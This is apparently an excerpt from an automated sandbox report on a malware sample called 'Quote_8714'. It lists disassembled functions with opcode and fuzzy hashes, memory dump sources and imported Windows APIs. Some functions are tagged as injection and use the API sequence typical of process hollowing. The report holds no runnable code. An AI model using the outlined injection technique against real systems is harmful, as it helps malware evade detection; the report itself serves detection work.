Opcode Fuzzy Hash: e7ba9a7a1e617edb1771d0dab76367c813758c9136fb7e9a18d21143d88313ae
Instruction Fuzzy Hash: 4921F5B0D146189BEB28CFAAC9447DEBEF6AFC9300F14C06AD40866254DB75094A8F90

Function 04FFF920 Relevance: 2.8, Strings: 2, Instructions: 320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 04FFFACC
Hbq, xrefs: 04FFFA99

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 3af4e13f3ecb1a251f83d82fb8aaea7564dd246c20d2e837d13fe061cb02d009
Instruction ID: d48000d87a90182296b43f3f48671d07e762abbf23142901219a6795e7c75dcc
Opcode Fuzzy Hash: 3af4e13f3ecb1a251f83d82fb8aaea7564dd246c20d2e837d13fe061cb02d009
Instruction Fuzzy Hash: BEC19F31B006169FCB14DF69C9845AEBBF2FF88314F10456AD605E3760EB34E956CBA1

Function 04FF2EF0 Relevance: 2.8, Strings: 2, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 04FF3EC8
(bq, xrefs: 04FF3E0A

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 7694249d5b6688735d1e58f35c6822caf11d38fb1b8d08955f628cefb741bb0b
Instruction ID: 5ef668886c8adce00f6088b234178de52bc21e45a3174feb4d7dbdb1d4377475
Opcode Fuzzy Hash: 7694249d5b6688735d1e58f35c6822caf11d38fb1b8d08955f628cefb741bb0b
Instruction Fuzzy Hash: 4F81C171B00209DFDB14EFA8D8445AEBFB6EF84300F148569EA05EB3A1DB34E946C795

Function 04FF3320 Relevance: 2.6, Strings: 2, Instructions: 119COMMON

Download Yara Rule

Strings

Hbq, xrefs: 04FF344E
Hbq, xrefs: 04FF33E8

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 2613cb942ef5822993becd6a1f7be486fa25b589b6dbea1e69e1bfff85edd6a4
Instruction ID: d6b554bf10e6d3a9f78c43e76e8560d1fb5491dc88265100f2a943a088ec2d5f
Opcode Fuzzy Hash: 2613cb942ef5822993becd6a1f7be486fa25b589b6dbea1e69e1bfff85edd6a4
Instruction Fuzzy Hash: 0A419335B002198FDB05EFB988545BE7BF7EFC9200B14446AD505EB3A5DF389E0687A2

Function 0723CFF0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0723D226

Memory Dump Source

Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a03ae46fff1e6b0747420f136f34fc1394fd3c09ebf7e0a8b8c68c2ff0648928
Instruction ID: 1427afdc45c4d44555173e4de3f578822e573af88d05e21dd5f1462870294358
Opcode Fuzzy Hash: a03ae46fff1e6b0747420f136f34fc1394fd3c09ebf7e0a8b8c68c2ff0648928
Instruction Fuzzy Hash: 10915CB1E1021ADFDB14DFA8C841BDEBBB6FF44310F1481A9E858A7250DB749985CF92

Function 0106AED0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0106B126

Memory Dump Source

Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 69f078f46062b123f77b36596fb635a5d1d7d9904f9efd73248a09debad1faf5
Instruction ID: b59f26cb3d6b0890f592bfae8b81f2be279815a6527b971b2c0634de8b58c5cf
Opcode Fuzzy Hash: 69f078f46062b123f77b36596fb635a5d1d7d9904f9efd73248a09debad1faf5
Instruction Fuzzy Hash: 667134B0A00B05CFE764EF69D04079ABBF5FF88300F008A69D08AD7A50D775E949CB91

Function 04F2BDC0 Relevance: 1.7, APIs: 1, Instructions: 181COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000014,?,?,03A5412C,02A70894,?,00000000), ref: 04F2BF46

Memory Dump Source

Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 5ca0ae98415749303d1571b1dc53e0d254ffb3d8590d1ebbcce424523bb89f51
Instruction ID: 1b637f6ae57e6396b26ca1314be3d9adba637169c8ce1d2dae3e3abc3db59a27
Opcode Fuzzy Hash: 5ca0ae98415749303d1571b1dc53e0d254ffb3d8590d1ebbcce424523bb89f51
Instruction Fuzzy Hash: 2E71AC74A01219EFCB05DFA8D994DAEBBB6FF48714F114098F901AB361DB31E882CB50

Function 04F20BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04F24381

Memory Dump Source

Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: fe34f554608fe98873f4f70d84b2728c5a43cf7e5fb3df61a04f311dc9142c41
Instruction ID: 7c90ef5dde60bbc2491e4668109c9098c349bc86c9a16830fdf1068d3e89fe70
Opcode Fuzzy Hash: fe34f554608fe98873f4f70d84b2728c5a43cf7e5fb3df61a04f311dc9142c41
Instruction Fuzzy Hash: 694136B5A002159FDB14CF99C948AABBBF5FF88314F24C459E519AB321D374A841CFA0

Function 0106449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 010659A9

Memory Dump Source

Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: dc099fe5711f14c6658911e438f2bfb543f5a903d8c0faa71a6fc789065ae69e
Instruction ID: d765d42dc08074516294a203e4195fbab1d3bf46ec8fdac9c662cee321943d37
Opcode Fuzzy Hash: dc099fe5711f14c6658911e438f2bfb543f5a903d8c0faa71a6fc789065ae69e
Instruction Fuzzy Hash: 1841BFB0C00719CBDB24DFA9C884A9EBBF5BF49304F2480AAD448BB255DB756946CF90

Function 010658F3 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 010659A9

Memory Dump Source

Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9bf553ea09f1d317e3127b088aa6bb79ca9c1e3400a453479ab0dfcaf558d3bf
Instruction ID: f7001c3c77abcc4362131501e4958a334aa3d9b8c8756811a7e133c56871f662
Opcode Fuzzy Hash: 9bf553ea09f1d317e3127b088aa6bb79ca9c1e3400a453479ab0dfcaf558d3bf
Instruction Fuzzy Hash: AE41CEB0C00719CBDB24DFA9C984A8DBBB5BF49304F2480AAD448BB255DB756946CF91

Function 0723CD68 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0723CDF8

Memory Dump Source

Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 91f11169663fbd25ab7edae7beba8b6868f1c9c9f9afd7e0879fd5fa867aaef5
Instruction ID: b2464a31bdf7d0082cfe9b748e74650a37cb97ffc812a2657a0a4e998895066f
Opcode Fuzzy Hash: 91f11169663fbd25ab7edae7beba8b6868f1c9c9f9afd7e0879fd5fa867aaef5
Instruction Fuzzy Hash: A22169B19003599FDB10CFA9C881BDEBBF5FF48310F108429E959A7240C7789944CBA4

Function 0106CA40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0106D366,?,?,?,?,?), ref: 0106D427

Memory Dump Source

Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b2311e11b04ee123bbdf22af138010421fa47f0c31354c796e4d1e49b1473816
Instruction ID: 4c838df15d096cf9fa929e903e0abe6a32e1bbb10cd017ceba572f3c0f8e13d6
Opcode Fuzzy Hash: b2311e11b04ee123bbdf22af138010421fa47f0c31354c796e4d1e49b1473816
Instruction Fuzzy Hash: 9121E4B5900258DFDB10CF9AD984ADEFFF8EB48310F14805AE954A7311D374A950CFA4

Function 0106D398 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0106D366,?,?,?,?,?), ref: 0106D427

Memory Dump Source

Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f8283e637fb97d7a2bf14288d1102502e69fed4ba6674d1ac2712822a84a9c42
Instruction ID: 4a40c19215795d8c05125eddd43187f35146e826388e9c906208050118503005
Opcode Fuzzy Hash: f8283e637fb97d7a2bf14288d1102502e69fed4ba6674d1ac2712822a84a9c42
Instruction Fuzzy Hash: 0021E4B5900259DFDB10CF9AD984ADEFFF4EB48320F14801AE958A7351C379A941CFA5

Function 0723C798 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0723C816

Memory Dump Source

Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1d1da67b3721fd8ded05efe0dd11f8c6ead1b80199bef157bfd50bf5a4b708f9
Instruction ID: 6d4b2c0de9d724f6ce99f064815f8ebf162c36c7885d2a228ca4c38f96ba7976
Opcode Fuzzy Hash: 1d1da67b3721fd8ded05efe0dd11f8c6ead1b80199bef157bfd50bf5a4b708f9
Instruction Fuzzy Hash: 002137B1D102098FDB10DFAAC485BEEBBF4EF48324F108429D459A7240C7789985CFA4

Function 0723CE58 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0723CED8

Memory Dump Source

Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 42a9a8d27da027185fc15c14636a5baff9ea95792ad98d03ee374f1a8c084b61
Instruction ID: 7fe1053e620dd0f2aa43c59c336ed0dd4c97aaee7d8b7524d22acb75e68ad236
Opcode Fuzzy Hash: 42a9a8d27da027185fc15c14636a5baff9ea95792ad98d03ee374f1a8c084b61
Instruction Fuzzy Hash: 4C2139B1C003599FDB10DFAAC845AEEFBF5FF48310F50842AE559A7250C7349944DBA4

Function 0B263AE1 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B263B0D

Memory Dump Source

Source File: 00000000.00000002.1756959929.000000000B260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b260000_Quote_8714.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b394e0a40387f0b1f5ef4015802ceb1476a4269cefecb4ee873f512e14e57fe
Instruction ID: ce07f25b7ef562e1b2e0403788bce8dfd1493c8baab5b0526526655d6432f6a6
Opcode Fuzzy Hash: 7b394e0a40387f0b1f5ef4015802ceb1476a4269cefecb4ee873f512e14e57fe
Instruction Fuzzy Hash: 95115E353201128FC714EE3DC85496E77AAEFC6A5471500A9E602CF3BAEE72DC42CB54

Function 0B263AF0 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B263B0D

Memory Dump Source

Source File: 00000000.00000002.1756959929.000000000B260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b260000_Quote_8714.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 25c3b302a4f46a612ee766b0dc8232d6e310285b684a0a6c167f6d18bf64bdf6
Instruction ID: 7c3e9d84df246f208f77c76cf13eb3b7940c071e9590ca9c1de97bcb6b468aa9
Opcode Fuzzy Hash: 25c3b302a4f46a612ee766b0dc8232d6e310285b684a0a6c167f6d18bf64bdf6
Instruction Fuzzy Hash: 84111E343205118FC618AF3ED95486E77AAEFC6A5471540A9E602CB3B9DE72DC42C754

Function 0BCA5E00 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 0BCA5E70

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 3f66ec8477d2d03f129751224d922636c1d292ae6f09c52b19dc36fa1f6c8b7e
Instruction ID: 10793b48957853aa0cf78ca80449f0f1101e958591d4daf3b437d5b08c807122
Opcode Fuzzy Hash: 3f66ec8477d2d03f129751224d922636c1d292ae6f09c52b19dc36fa1f6c8b7e
Instruction Fuzzy Hash: 2A2114B5C00209DFDB10CF9AD885BEEBBF4FB48314F10802AE859A3260C378A545CFA5

Function 0723CCA8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0723CD16

Memory Dump Source

Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 11ff9cbb3bf8b7645d9585ff2e614c0f6e74ec64c92689b38af47bc56dc35b82
Instruction ID: 5a425f4570a0ab7c8dd87331a4276e09311a4da93093ffdd2735c9f71b7aafe4
Opcode Fuzzy Hash: 11ff9cbb3bf8b7645d9585ff2e614c0f6e74ec64c92689b38af47bc56dc35b82
Instruction Fuzzy Hash: 4C1137B29002499FDB10DFAAC845BDEFFF5EF88320F208419E559A7250C775A954CFA4

Function 0BCA5E08 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 0BCA5E70

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: a2612eb78f9aa45599442c959f8b33bf2556b2c08ddc7a8391b74c11f533413a
Instruction ID: 19feb4c88c88b575f0456ada1cb48f3cab3bd2eb6c3b4898c23091f559f6ac14
Opcode Fuzzy Hash: a2612eb78f9aa45599442c959f8b33bf2556b2c08ddc7a8391b74c11f533413a
Instruction Fuzzy Hash: 0B11E4B58002499FDB10CF9AD944ADEBBF8FB48324F10842AE958A3250C378A544CFA5

Function 0BCA61A8 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0BCA620D

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 8027aebc1bdefadf193fe751c8b5fae8c59b989f1e2edc547f894ae81deccca9
Instruction ID: a3f848d813c927c1af45fde4c26595a55720d4ab3194c2cb0b8545f94c39d529
Opcode Fuzzy Hash: 8027aebc1bdefadf193fe751c8b5fae8c59b989f1e2edc547f894ae81deccca9
Instruction Fuzzy Hash: 6B11D4B5C003499FDB10DF9AD944BDEFBF8EB48324F14846AE958A3250C378A944CFA5

Function 0BCA61A7 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0BCA620D

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6d034a6638e80ed7c1d7cbf22cbe00844403f0fa5c9e535cf9e9b5aaca070614
Instruction ID: e475df4b9e90b529791ecf0232f52d782669ecd733be9295ccaf7bd20f642f38
Opcode Fuzzy Hash: 6d034a6638e80ed7c1d7cbf22cbe00844403f0fa5c9e535cf9e9b5aaca070614
Instruction Fuzzy Hash: 2711C3B5C002499FDB10CF9AD985BEEFBF4EB48314F14856AE858A3250C378A945CFA5

Function 0BCA0C21 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0BCA0C85

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 39d272e78b84849b9b044a0778345509ffe9c05dddc5bf2d7c678b48952faff7
Instruction ID: 6264e9964daa4997eceaacf171a484d4de393fb751c88fd7a0b96ee957f2ca30
Opcode Fuzzy Hash: 39d272e78b84849b9b044a0778345509ffe9c05dddc5bf2d7c678b48952faff7
Instruction Fuzzy Hash: 241125B5800249CFDB10CF9AC985BEEBBF4EB48324F10845AE558A3250D378A984CFA5

Function 0723BEB0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0723BF12

Memory Dump Source

Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8466fbdc2a2609eae4c868076263220aa6fa6d12ec28736e4444a6f80daaa008
Instruction ID: 3994e735669ac9b79edda384604408bd12378056f9a4fb63d86a335853955938
Opcode Fuzzy Hash: 8466fbdc2a2609eae4c868076263220aa6fa6d12ec28736e4444a6f80daaa008
Instruction Fuzzy Hash: 69113AB1D002498FDB10DFAAC4457DEFBF4EF88324F208419D459A7250C775A944CFA4

Function 0BCA0C28 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0BCA0C85

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a2d26b8ed36902b5856de90f812d8bcf0eddcdbebe7c2dd5cad1eaed945a6fa6
Instruction ID: e4aadd38f28a4478cddc12b6eba894b8131a815f3f9f60c12298fa525143a8b8
Opcode Fuzzy Hash: a2d26b8ed36902b5856de90f812d8bcf0eddcdbebe7c2dd5cad1eaed945a6fa6
Instruction Fuzzy Hash: 621106B5800349DFDB10CF9AC945BDEFBF8EB48364F10845AE558A3251D378A984CFA5

Function 0106B0C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0106B126

Memory Dump Source

Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f8a7a51cc1aba50fe4c3c560a6955094bf0b98cea8498b7afcad8f963a0c53a8
Instruction ID: 900f31af3eae9a48a36d8f9cea1af52d53036a01a4b8cc00e544772c29814962
Opcode Fuzzy Hash: f8a7a51cc1aba50fe4c3c560a6955094bf0b98cea8498b7afcad8f963a0c53a8
Instruction Fuzzy Hash: 84110FB5D00249CFDB10DF9AD844ADEFBF8AF89220F10846AD858B7210C375A545CFA1

Function 0BCA6680 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 0BCA66DD

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 1064f3f6143c1346293b97d20939938a2232d59f35c96a245f6c2ab14752f5de
Instruction ID: 2872f2646efbc5862ef831e982ff542213bc81e789e60ea7866f78dd9c97551b
Opcode Fuzzy Hash: 1064f3f6143c1346293b97d20939938a2232d59f35c96a245f6c2ab14752f5de
Instruction Fuzzy Hash: 2E11FBB1C006498FCB10DF9AE844BCEFBF4EB48324F10846AD818A7210C378A644CFA5

Function 0BCA667C Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 0BCA66DD

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 12b217aba2d09861e4625062c9402086af343e924a5c28a1a7c98b1e34b6b5f3
Instruction ID: c17e73908ce73f39c4e5dac57c66e356630524633dca1ac7668c87286a7ece8c
Opcode Fuzzy Hash: 12b217aba2d09861e4625062c9402086af343e924a5c28a1a7c98b1e34b6b5f3
Instruction Fuzzy Hash: 0E11FBB1C006498FCB10DF9AE844BCEFBF4EB48324F10846AD868A7210D378A644CFA5

Function 0106B159 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0106B126

Memory Dump Source

Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2ea45d9a37733a2ca7d8a74053c14910b59dd0a1a77c40e5d3b1d9d6ead6423f
Instruction ID: 30f3a94a7ca6e28314f750a784c6482e8a7b6d9945f54fee3b264eca659cd2b8
Opcode Fuzzy Hash: 2ea45d9a37733a2ca7d8a74053c14910b59dd0a1a77c40e5d3b1d9d6ead6423f
Instruction Fuzzy Hash: E2F037B5904344CFDB10DF99D4043DEBFF5AF49324F14858AC1A8AB2A1C379A545CF61

Function 04FFC210 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

(bq, xrefs: 04FFC2A1

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 0ad6a4f4317a9f64d72b7664e958a3afeaedb16f65faa96ad37f1223fc807076
Instruction ID: 6c94245fd759fe4b9ca24b07d947e2c5c7d697ad702bf5c6ee574562213c017e
Opcode Fuzzy Hash: 0ad6a4f4317a9f64d72b7664e958a3afeaedb16f65faa96ad37f1223fc807076
Instruction Fuzzy Hash: BC41B035B005604FDB19ABB9982422E37A7EFC9754B1445A9D60ACB3A4DE34EC0387D5

Function 04FF9C90 Relevance: .7, Instructions: 729COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e37ec2265902158235a3176a6497dd0230f46ff671b236b8862ef6214dfadf
Instruction ID: 6d0de0b3604c996f486c8ce7527f7b1f5d5cc0c0f771ed3c950104d1181892a0
Opcode Fuzzy Hash: 06e37ec2265902158235a3176a6497dd0230f46ff671b236b8862ef6214dfadf
Instruction Fuzzy Hash: C0723F31D10609CFDB14EF68C894A9DB7B1FF45305F0086A9D549AB265EF30AADACF81

Function 04FF6C10 Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ddd9f62dc7ba69d79f1eefca8590fc9d37ccb5513c406c00e274cb11ada5fa
Instruction ID: 76be1dc5786e8003e14562c2052646c0fba1ad4f420bc2e4729c1948d79c8380
Opcode Fuzzy Hash: 06ddd9f62dc7ba69d79f1eefca8590fc9d37ccb5513c406c00e274cb11ada5fa
Instruction Fuzzy Hash: D542E931E10659CBDB14EFA8C8946DDF7B1FF89304F1086A9D559B7261EB30AA86CF40

Function 04FFB928 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b49b32c9f5de4d9e5b5dc5b9a563828786dfcec2df294e78e44fd63c632cbde
Instruction ID: 7c92393ab48f1038ca2ee48e57c7f59ac5d0c0a4ba26d183daa48d7ad3136290
Opcode Fuzzy Hash: 6b49b32c9f5de4d9e5b5dc5b9a563828786dfcec2df294e78e44fd63c632cbde
